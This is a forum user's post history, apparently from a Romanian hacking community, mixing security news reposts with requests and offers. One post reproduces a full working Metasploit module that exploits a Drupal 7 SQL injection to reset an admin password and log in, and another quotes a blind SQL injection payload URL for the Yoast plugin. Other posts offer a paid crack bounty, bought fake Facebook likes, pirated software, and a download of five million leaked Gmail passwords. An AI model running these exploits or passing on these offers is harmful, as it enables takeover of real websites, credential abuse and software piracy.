Jump to content

mrreboot

Active Members
  • Posts

    268
  • Joined

  • Last visited

  • Days Won

    10

Everything posted by mrreboot

  1. Poli?i?tii fac perchezi?ii, luni, la firme ?i persoane suspectate c? au creat pagini de internet prin intermediul c?rora au retransmis programe ale unor posturi de televiziune, producând un prejudiciu de 1,5 milioane euro, bani care au ajuns în conturile mai multor societ??i, unele de tip off-shore. Surse din Poli?ie sus?in c? este vorba despre re?eaua Spice TV, controlat? de Alin Rotaru, g?l??eanul care a dezvoltat afacerea cu droguri „etnobotanice” în România, pân? ca acestea s? fie interzise prin lege. Patru persoane sunt cercetate în aceast? cauz?, pentru infrac?iuni în domeniul drepturilor de proprietate intelectual? ?i sp?lare de bani. Anchetatorii fac perchezi?ii la locuin?ele celor patru suspec?i ?i la firmele controlate de ace?tia, se arat? într-un comunicat de pres? al Parchetului Înaltei Cur?i de Casa?ie ?i Justi?ie. Potrivit anchetatorilor, în perioada 2013 - 2015, cei patru suspec?i au creat mai multe pagini de internet, prin intermediul c?rora au pus la dispozi?ia publicului ?i au retransmis, contra cost, programe ale unor posturi de televiziune cu acces restric?ionat, f?r? a avea acordul acestora, înc?lcând astfel prevederile în materia drepturilor de autor. De asemenea, cei patru suspec?i ar fi utilizat mai multor m?rci înregistrate, f?r? consim??mântul titularului ?i ar fi dobândit bunuri prin intermediul mai multor firme înregistrate în afara ??rii, folosind sumele de bani ob?inute din activit??ile ilicite desf??urate. Pentru a comercializa dispozitivele speciale de recep?ie a acestor programe ?i pentru a încasa sume de bani de la abona?i, suspec?ii au înfiin?at numeroase firme atât în România, cât ?i în alte state, inclusiv societ??i de tip "off-shore", cu ajutorul c?rora au disimulat tranzac?iile efectuate ?i au ascuns veniturile ilicite ob?inute, mare parte din sumele ob?inute în acest mod fiind reinvestite, a precizat Parchetul instan?ei supreme. Cei patru suspec?i au produs astfel un prejudiciu estimat de anchetatori la aproximativ 1,5 milioane de euro. Potrivit unor surse din Poli?ie, progamele de televiziune erau retransmise prin intermediul re?elei de televiziune prin internet Spice TV. Cele patru persoane suspectate în acest caz sunt Alin Rotaru, Iuliana Rotaru, Claudiu Rotaru ?i Gheorghe Rain, au precizat sursele citate. Perchezi?iile sunt f?cute de poli?i?tii de la Direc?ia de Investigare a Criminalit??ii Economice, Direc?ia de Comunica?ii ?i Tehnologia Informa?iei, Direc?ia de Opera?iuni Speciale ?i Serviciul pentru Interven?ii ?i Ac?iuni Speciale din Poli?ia Român?, cu sprijinul speciali?tilor de la Institutul Na?ional de Criminalistic?, sub coordonarea procurorilor Parchetului Înaltei Cur?i de Casa?ie ?i Justi?ie. SURSA
  2. Depinde si de calitatea VPS. Au trimis mail cu niste schimbari, nu blocheaza toate vps-urile. We received lots of feedback and many questions from our members regarding our decision to block IPs belonging to hosting providers from participating in the Traffic Exchange. Read below for further explanations and about a change we are introducing to the rule. We are perfectly aware that the change would cause inconvenience to some of our members, so let us further explain why we made the decision in the first place. As mentioned in our previous e-mail, the aim was to improve the overall traffic quality provided by the HitLeap service. How would blocking hosting provider IPs help? It's quite simple actually. A lot of HitLeap Viewer instances running on hosting provider machines are running in low resource conditions. This prevents the HitLeap Viewer from fully loading all websites, resulting in reduced traffic quality for all members. On the other hand, home users would not be banned as part of the new rule and home computers are usually powerful enough to properly run the application without any problems. After listening to the feedback and opinions of our members, we realized that this decision would cause unnecessary damage to many honest members - those who run the HitLeap Viewer on reasonably powerful servers or even home users running their internet connection through an IP belonging to hosting providers (e.g. VPNs). We figured we could do better and offer a solution that worked for everyone. Hosting provider IPs will no longer be blocked. Instead, we are introducing Session Slots. Similar to Website Slots, you need 1 Session Slot for every instance of HitLeap Viewer. Regular members get 2 Session Slots and Premium members get 5 Session Slots. This will cover the large majority of home users. If you wish to start more instances, you can always purchase more Session Slots at very reasonable prices. This, along with much stricter quality controls we will be introducing, will incentivize people to contribute quality traffic to the HitLeap network, removing the need to apply a very broad ban by simply blocking hosting provider IPs. We believe this change to be the most flexible solution, while still allowing us to improve traffic quality going forward. For anyone reading this far, here's a small extra bonus for you: a teaser of a Linux version of HitLeap Viewer we have been working on: see here
  3. // scuze ca ma bag peste tine, dar poate mai au si altii nevoie. Era un ebook cum sa primesti licente pentru Autocad 2014 sau 2015 valabila 3 ani. Pentru cei interesati: =gGd0B3cBNTJv8CZs5CZy9Gci9Ge1NXZyN2buRXZuRnLj9WbvU3LxAjNwIDO4ATNvEWd092YhRmLw52Z No hints.
  4. Google today announced the launch of a security rewards program for Android at Black Hat’s Mobile Security Summit in London. The Android program will only cover vulnerabilities that affect Nexus phone and tablets available for sale in the Google Play Store, though. Right now, that’s the Nexus 6 phone and Nexus 9 tablet. Base rewards start at $500 for reporting moderately severe vulnerabilities and go up to $8,000 for researchers who report a critical bug, provide a test case and submit a patch. On top of that, Google will offer up to an additional $30,000 for exploits that can compromise TrustZone or Verified Boot (and slightly smaller rewards up to $10,000 and $20,000 for attacks from installed apps and remote or proximal attacks). Google believes the whole Android ecosystem will benefit from this vulnerability research, though. Given that the Nexus devices are the only ones Google has full control over — and that they run the company’s stock version of Android — it makes sense that the company would restrict this program to vulnerabilities that can be reproduced on these devices. The new program is in addition to Google’s existing Patch Reward Program, which also includes the open-source foundations of Android. Bugs that qualify for this new program include vulnerabilities in the Android open source code, OEM libraries and drivers, the kernel and ARM TrustZone OS and modules. Google says it has now paid out more than $4 million since the launch of its first bug bounty program in 2010. In 2014 alone, it paid out a total $1.5 million to more than 200 researchers. Source
  5. Nu ma intereseaza sa fie reali si nici tara, am cumparat de pe addmefast si in doua zile s-au dus toti. (cred ca e un filtru de la fb) Ideea e sa tina chiar daca sunt falsi.
  6. Cumpar 10k like-uri pentru o pagina FaceBook, astept pm cu oferte. Plata: PayPal Persoanelor cu rep platesc inainte.
  7. Windows 10 has all kinds of great stuff going on under the hood, but one of the most intriguing things is a special version designed for the Raspberry Pi 2 and Arduino-certified boards. You can check out that version right now. All the Important Stuff Microsoft Announced at Build 2015 Today Today, Microsoft held its (mostly boring!) developer keynote at Build 2015. If you’re not a… Read more The Windows 10 IoT Core Insider developer preview works with the Raspberry Pi 2, MinnowBoard Max, and Intel Galileo. It’ll also interface with other Arduino boards through a Windows Remote and Windows Virtual Shields. As you’d expect, the software’s a little rough around the edges, but the Windows Dev Center has a bunch of projects to get you familiar with the software. You can sign up for the developer preview and download the newest build for free at the link below. Develop Windows IoT Apps | Windows Dev Center via Windows Blog Source: LifeHacker
  8. Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Sniffs URLs visited POST loads sent HTTP form logins/passwords HTTP basic auth logins/passwords HTTP searches FTP logins/passwords IRC logins/passwords POP logins/passwords IMAP logins/passwords Telnet logins/passwords SMTP logins/passwords SNMP community string NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc Kerberos SOURCE
  9. Last year at Google I/O developer event, Google launched a limited beta "App Runtime for Chrome" (ARC) project, which now expanded to run millions of Android apps within Chrome browser. Google has released a new developer tool called App Runtime for Chrome (ARC) Welder that allows Android apps to run on Chrome for Linux, Windows, and OS X systems. App Runtime for Chrome (ARC) was an early experiment specifically designed for app developers, but now anyone can download it. Google Chrome's ARC Welder app can now run any of your favorite Android apps like WhatsApp, Candy Crush, Angry Birds, all from your Chrome web browser. ARC welder tool operates via some special runtime implemented using Native Client (NaCl) in-browser binary execution tech. Native Client is a Chrome sandboxing technology that allows Chrome plugins and apps to run at near-native speeds, taking full advantage of the system's CPU and GPU. Google ported complete Android stack to Native Client, allowing Android apps to run on most major operating systems. Google ARC welder tool is based on Android 4.4, but there are some limitations: you can load only one app at a time you have to select portrait or landscape layout you need to choose, whether you want the app to run on phone- or tablet-style. LEARN HOW TO RUN ANDROID APPS IN CHROME:- Install the latest Google Chrome browser. Download and run the ARC Welder app from the Chrome Store. Add third party APK file host. After downloading APK app file to your PC, click Open. Select the mode -> "Tablet" or "Phone" -> in which you want to run your app. Finally, click the "Launch App" button. I have personally tried this tool before writing, and some of my favorite Android apps work pretty well. SOURCE
  10. Platesc 80€ pentru un crack la urmatorul program, din cate am vazut are protectie HASP4. Executabil: formula.exe Este destul de vechi, presupun ca e facut in Visual Basic 6. Link: MEGA Metoda de plata paypal sau transfer bancar dupa ce imi aratati prin teamviewer sau video ca functioneaza. In caz ca ajuta la ceva am dongle original dar nu mai functioneaza, e expirat.
  11. A critical vulnerability has been discovered in the most popular plugin of the WordPress content management platform (CMS) that puts tens of Millions of websites at risks of being hacked by the attackers. The vulnerability actually resides in most versions of a WordPress plugin known as ‘WordPress SEO by Yoast,’ which has more than 14 Million downloads according to Yoast website, making it one of the most popular plugins of WordPress for easily optimizing websites for search engines i.e Search engine optimization (SEO). The vulnerability in WordPress SEO by Yoast has been discovered by Ryan Dewhurst, developer of the WordPress vulnerability scanner ‘WPScan’. All the versions prior to 1.7.3.3 of ‘WordPress SEO by Yoast’ are vulnerable to Blind SQL Injection web application flaw, according to an advisory published today. SQL injection (SQLi) vulnerabilities are ranked as critical one because it could cause a database breach and lead to confidential information leakage. Basically in SQLi attack, an attacker inserts a malformed SQL query into an application via client-side input. HOW YOAST VULNERABILITY WORKS However, in this scenario, an outside hacker can’t trigger this vulnerability itself because the flaw actually resides in the 'admin/class-bulk-editor-list-table.php' file, which is authorized to be accessed by WordPress Admin, Editor or Author privileged users only. Therefore, in order to successfully exploit this vulnerability, it is required to trigger the exploit from authorized users only. This can be achieved with the help of social engineering, where an attacker can trick authorized user to click on a specially crafted payload exploitable URL. If the authorized WordPress user falls victim to the attack, this could allow the exploit to execute arbitrary SQL queries on the victim WordPress web site, Ryan explained to security blogger Graham Cluley. Ryan also released a proof-of-concept payload of Blind SQL Injection vulnerability in ‘WordPress SEO by Yoast’, which is as follows: http://victim-wordpress-website.com/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc PATCH FOR YOAST SQLi VULNERABILITY However, the vulnerability has reportedly been patched in the latest version of WordPress SEO by Yoast (1.7.4) by Yoast WordPress plugin developers, and change log mentions that latest version has "fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor." Generally, it has been believed that if you have not installed WordPress Yoast for SEO, then your WordPress website is seriously incomplete. The vulnerability is really serious for website owners who wish to increase their search engine traffic by using this plugin. Therefore, WordPress administrators with disabled Auto-update feature are recommended to upgrade their WordPress SEO by Yoast plugin as soon as possible or they can manually download the latest version from WordPress plugin repository. If you have installed WordPress 3.7 version and above, then you can enable fully automate updating of your plugins and themes from Manage > Plugins & Themes > Auto Updates tab.
  12. PHP Script to send and receive messages on WhatsApp I have been reading many tutorials for sending and receiving WhatsApp Messages via PHP but there is not a single Article Which explains properly with Steps that How To retrieve Your WhatsApp password Which is created and Stored when you create a WhatsApp Account on the WhatsApp Server which is the main Challenge as of now in other Articles. Thanks To this tool Which has Made 50% of the work Easy. https://github.com/shirioko/WART Okay So we will Quickly go through the Steps for WhatsApp Registration Tool : Go To the link https://github.com/shirioko/WART Download The Whole project by Clicking Clone to Desktop Run the WART-1.7.3.0 Exe File WART Enter Phone Number with Country Code (e.g. India Number : 91xxxxxxxxxx) P.s. Do not put any Special Symbol like (+91) for India Click on Request Code and You will Receive a Code from WhatsApp on the Entered Mobile Number. Now Verify that Code in 2nd Step and That’s it . You are here . Your password will Appear. P.s. Do not Share your password with Anyone Because it Can be used in loop for any Kind of messages. okay Now we are done with 50% of the task . Now we need to write the php Script Which will Send Messages to WhatsApp Registered Number. You will need 2 things for Sending Messages to WhatsApp through PHP : Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE) : 91xxxxxxxxxxx Password (Which You got From The WART.EXE TOOL Alright Sparky Lets Get this Done….. <?php require_once ‘./src/whatsprot.class.php’; $username = “919xxxxxxxxx”; //Mobile Phone prefixed with country code so for india it will be 91xxxxxxxx $password = “your password”; $w = new WhatsProt($username, 0, “Mayank Grover Blog”, true); //Name your application by replacing “WhatsApp Messaging” $w->connect(); $w->loginWithPassword($password); $target = ’91xxxxxxxxxxx’; //Target Phone,reciever phone $message = ‘Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account’; $w->SendPresenceSubscription($target); //Let us first send presence to user $w->sendMessage($target,$message ); // Send Message echo “Message Sent Successfully”; ?> So Everything is Quite Clear in the above Script i.e. You need to set your Application Details Username as Mobile Number password Which you got from WART Tool Target as your Target Mobile Number and Lastly The message(Plain Text Which you need to send). Okay Now I know many Questions are Coming in your mind. In first line Require src/whatsprot.class.php What is This. ??? You Need to Download the WhatsApi from this Link . There You Will find the src directory with all the source files. Can we only Send Plain Text messages Or media like Images and Videos??? Yes we can send media file Also. So Next I will be writing php script to send Media file To any WhatsApp Account. SOURCE
  13. The most popular smartphone messaging service WhatsApp is now able to communicate with friends from their PC. No Rumours at all !! Enjoy WhatsApp from your desktop from now on. Last month, it was leaked that Whatsapp was working on a web client and finally from today they are introducing it to the public. The feature is called "WhatsApp Web," which gives its users the ability to read and send messages directly from their web browsers. Interested WhatsApp users simply need to open Chrome and navigate to WhatsApp Web in order to get started. A QR code will appear on the web page, which must be scanned using WhatsApp mobile application to activate the service. WhatsApp Web requires that you install and run the latest version of the Android app on your phone. The feature currently works on Android, Windows Phone, and BlackBerry, but unfortunately, there's no web solution at this time for iOS users because of limitations of the platform. "Today, for the first time, millions of you will have the ability to use WhatsApp on your web browser," WhatsApp wrote in a blog post. "Our web client is simply an extension of your phone: The web browser mirrors conversations and messages from your mobile device — this means all of your messages still live on your phone." Mediafire | WhatsApp 2.11.498 sau update de pe Aptoide Source
  14. Oh, the irony… Remember, Lizard Squad the hackers who took down the XBox Live and PlayStation Networks at Christmas, in what they claimed was a publicity stunt for their DDoS-for-hire service? Well now, in an act of supreme irony worthy of a singalong from Alanis Morissette, Lizard Squad has been hacked itself. Oh dear. What a shame. Couldn’t happen to a nicer bunch of fellows… As Brian Krebs reports, the gang’s LizardStresser DDoS-on-demand service – powered by thousands of hacked residential internet routers – has been “completely compromised” and details of over 14,000 users passed to the authorities. Astonishingly, it appears that the Lizard Squad failed to encrypt its database of registered users – but instead stored details of their usernames and passwords in plaintext. A schoolboy error if ever I heard one. LizardAs I said at the end of last year, the authorities are likely to take a dim view of anyone purchasing the services of the Lizard Squad to launch a denial-of-service attack against a website or internet service. I wonder what LizardStresser’s users, who apparently have paid Lizard Squad the tidy sum of $11,000 in bitcoins to launch attacks so far, will think of their details now being in the hands of law enforcement agencies like the FBI? Lizard Squad hasn’t been having a great time of it since their yuletide antics against video game fans. Firstly, police in the UK arrested 22-year-old Vinnie Omari, a suspected member of the gang who perhaps made the unwise move of offering his expert advice about the Lizard Squad in an on-screen TV interview. Omari has since been bailed until March. Then it was revealed that Finnish police had questioned another suspected member of the Lizard Squad gang – Julius Kivimäki. Like Omari, Kivimäki hadn’t been shy about courting the media’s attention. And last Friday, British police announced that they had arrested an 18-year-old man in Southport in connection with the denial-of-service attacks against PlayStation Network and XBox Live. According to a BBC news report, the latest arrest was the result of a joint investigation between British law enforcement agencies and the FBI. The man has now been bailed until May. It would be a mistake to think, however, that the police action seen so far necessarily spells the end for Lizard Squad’s antics. The group’s Twitter feed, for instance, remains as vocal as ever – even going so far as to mimic the final tweet posted by Jake “Topiary” Davis, the spokesperson of the busted Lulzsec hacking gang, before his arrest in 2011. Source
  15. @ON Cam ciudata "ancheta", pare prea direct. @Off Make my day "CD marca Verbatim"
  16. A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported ‘The Hacker News’. Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst. In a video demonstration, they showed that by sending a 2000 words (2kb in size) message in special character set can crash the receiver's app. The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely. "What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal," Bhuyan told THN in an e-mail. According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions. Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don’t want someone to keep records of my chat with them, then I can also send the same message exploit to the person. The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1. They have also provided the Proof-of-Concept (PoC) video for the attack, users can watch above. WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million. WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the "largest deployment of end-to-end encryption ever." Video --> Source
  17. Am cumparat si eu, nici la 1 zi am primit track code de la FedEx. Sunt seriosi.
  18. Download link: https://github.com/google/material-design-icons/releases/tag/1.0.0 Source: Gizmodo.es
  19. Pentru metasploit ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Drupal 7 SQL Injection - Password Change', 'Description' => %q{ This module exploits a SQL injection vulnerability in Drupal 7 to update the password of a selected user to 'drupal' }, 'Author' => [ 'Stefan Horst', # Vulnerability discovery 'Charlie Briggs' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', 'CVE-2014-3704'], ['URL', 'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html'], ['URL', 'https://www.drupal.org/SA-CORE-2014-005'] ], 'DisclosureDate' => 'Oct 15 2014')) register_options( [ OptString.new('TARGETURI', [true, "The full URI to Drupal", "/"]), OptString.new('USERNAME', [true, "Username of target user", "admin"]) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) if res and res.code == 200 and res.body.to_s =~ /form_build_id/ return Msf::Exploit::CheckCode::Appears end return Msf::Exploit::CheckCode::Safe end def run print_status("#{peer} - Attempting to update password hash for user '#{datastore['USERNAME']}'") hash = "$S$Drl0vgZ9yuU9uc4JyaTMHxMPriC7q/PsOUOx52fCrVQSTpI/Tu4x" sqli = "name[lol;update+{users}+set+pass%3d'#{hash}'+where+name%3d'#{datastore['USERNAME']}';--]=lol&name[lol]=lol&pass=lol&&form_build_id=lol&form_id=user_login&op=Log+in" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'q' => 'user', }, 'data' => sqli }) if res and res.code == 200 print_status("#{peer} - Received 200, checking ability to login...") check_login(datastore['USERNAME'], 'drupal') else print_error("Rut roh. Something went wrong :/") end end def check_login(username, password) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'q' => 'user' }, 'vars_post' => { 'name' => username, 'pass' => password, 'form_build_id' => 'lol', 'form_id' => 'user_login', 'op' => 'Log In' } }) if res and res.code == 302 print_status("#{peer} - Received 302, following...") redirect = URI(res.headers['Location']).path cookie = res.headers['Set-Cookie'] res = send_request_cgi({ 'method' => 'GET', 'uri' => redirect, 'headers' => { 'Cookie' => cookie } }) if res and res.code == 200 check_content(res.body.to_s, username, password) end elsif res and res.code == 200 check_content(res.body.to_s, username, password) end end def check_content(body, username, password) if body !=~ /not-logged-in/ print_good("Success! Logged in as #{username}:#{password}") else print_error("Unable to log in, perhaps this site is patched!") end end end https://github.com/cnbriggs/stuff/blob/master/drupal_7_sqli.rb
  20. Yahoo servers have been infiltrated by Romanian hackers exploiting the Shellshock bug discovered last month, according to cyber security expert Jonathan Hall. In a blog post on his website Future South, Hall detailed the process by which he discovered Yahoo, Lycos and WinZip websites had all been infiltrated by a group of Romanian hackers. Hall had Google-searched a range of codes designed to identify which servers were vulnerable to Shellshock, and found that Romanian hackers had breached two Yahoo servers and were exploring the network in search of access points for Yahoo!Games, which has millions of users. Yahoo’s servers were vulnerable to attack because they were using an old version of server technology Bash. A Yahoo told The Independent: “A security flaw, called Shellshock, that could expose vulnerabilities in many web servers was identified on September 24. As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network. Last night, we isolated a handful of our impacted servers and at this time we have no evidence of a compromise to user data. We’re focused on providing the most secure experience possible for our users worldwide and are continuously working to protect our users’ data.” Yahoo CEO Marissa Mayer was alerted to the Shellshock hacks Before releasing this information, Hall emailed Yahoo and tweeted at its engineering team and CEO Marissa Mayer. It was confirmed to him that its servers had been infiltrated but Yahoo refused to pay him for alerting them as it was not part of the company’s bug bounty programme. Yahoo is notorious for its disregard of bug bounty hunters, having last year rewarded one such hacker who identified three bugs in Yahoo's servers with a $25 voucher for company merchandise. Also in his ethical-hack investigation, Hall found that hackers were using the WinZip domain - for the zip file creator/extractor - to locate other possibly accessible servers. “This breach affects ALL of us in one way or another, and it’s crucial that this problem be resolved with haste,” Hall said. Hall informed the FBI of the hackings. Romania is known as a hub for cyber crime; more than $1 billion stolen in the US by Romanian hackers in 2012, according to the American ambassador in Bucharest. Source: independent.co.uk
  21. O initiativa si un continut foarte bun.
  22. According to the Daily Dot, nearly 5 million usernames and passwords to Gmail accounts have been leaked on a Russian Bitcoin forum. Here's what you should know. The list has since been taken down, and there's no evidence that Gmail itself was hacked—just that these passwords have been leaked. Most sources are saying that lots of the information is quite old, so chances are they were leaked long ago—though others are claiming 60% of the passwords are still valid (not to mention really, really horrible). Source: LikeHacker Download link: google_5000000.7z — RGhost — file sharing
  23. Aici aveti ultima versiune patched (l-am avut inclus intr-un bundle cumparat si mi-au permis update) Download Link: https://mega.co.nz/#!fBREyLxK!6srS8EWSWYC7zvtImuGWSjPlbfC9R0fjzSf3cmaF60E Source: Envato
  24. Twitter announced on Wednesday the launch of its own bug bounty program, rewarding security researchers for “responsibly-disclosed issues.” In collaboration with HackerOne, the social media network will reward researchers with a minimum of $140 for each vulnerability reported, with the payout depending on the criticality of the bug. “We’re lucky to have a vibrant group of independent security researchers who volunteer their time to help us spot potential issues,” states Twitter’s HackerOne page. “To recognize their efforts and the important role they play in keeping Twitter safe for everyone, we offer a bounty for reporting certain qualifying security vulnerabilities.” In addition to the Twitter.com domain, the program also applies to various other subdomains, such as ads.twitter.com, apps.twitter.com, tweetdeck.twitter.com and mobile.twitter.com, as well as its iOS and Android apps. Common vulnerabilities that security researchers could cash out on include unauthorized access to DMs, unauthorized access to protected tweets, cross-site scripting (XSS), cross-site request forgery (CSRF) and remote code execution (RCE). “Any design or implementation issue that is reproducible and substantially affects the security of Twitter users is likely to be in scope for the program,” said Twitter, adding that other Twitter properties or applications may be added in the future. The cash reward is a new addition to Twitter’ HackerOne program, which has been active for about three months. So far, the site reports 44 hackers have been “thanked” and 46 bugs have been disclosed. The site also lists “Top Hackers” under a “Hall of Fame.” Tim Erlin, Tripwire’s director of IT security and risk strategy said bug bounty programs have proven to be an effective tool for vendors to drive towards responsible disclosure by providing financial motivation than favors a vendor-first response. “While Twitter’s minimum payment of $140, to match the 140 characters allowed in a tweet, is a nice touch, the real value lies in driving discovered bugs to Twitter developers, instead of into underground communities of potential attackers.” “A bug bounty program also provides the vendor with a clear, quantifiable cost to target for reduction through improved development practices. Bug bounty programs make sense at the business level, so it’s no surprise that Twitter is following suit with their own process.” Security researchers may agree that bug bounty programs are a great way to incentivize security research, since it’s much easier for researchers to justify privately disclosing a bug when they know they’re getting a payout. However, even though a company pays a bug bounty, they still need to be diligent about issuing a fix quickly. “There is nothing stopping a researcher from selling a bug to multiple sources,” said Lamar Bailey, Tripwire’s director of the Vulnerability and Exposure Research Team (VERT). The social media network is now one of many major Internet companies that aim to make the Web safer for users, including Facebook, Yahoo! and Mozilla. In July, Google also announced “Project Zero,” its new security research team working disclosing vulnerabilities across the Internet. Source
×
×
  • Create New...